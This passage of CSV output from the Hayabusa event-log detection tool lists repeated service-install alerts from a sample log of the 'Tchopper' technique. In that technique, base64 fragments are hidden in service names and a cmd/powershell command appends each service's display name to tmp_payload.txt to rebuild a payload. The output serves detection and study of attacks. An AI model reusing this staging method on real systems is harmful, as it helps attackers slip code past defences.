Tchopper.evtx" +2021-11-03 08:16:58.514 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:58.514 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:58.514 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:59.975 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:59.975 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:59.975 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:01.428 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:01.428 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:01.428 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:02.892 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:02.892 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:02.892 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:04.364 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:04.364 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:04.364 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:05.817 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:05.817 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:05.817 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:07.256 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:07.256 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:07.256 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:08.709 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:08.709 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:08.709 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:10.219 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:10.219 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:10.219 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:11.712 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:11.712 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:11.712 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:13.157 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:13.157 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:13.157 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:14.610 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:14.610 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:14.610 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:16.058 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:16.058 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 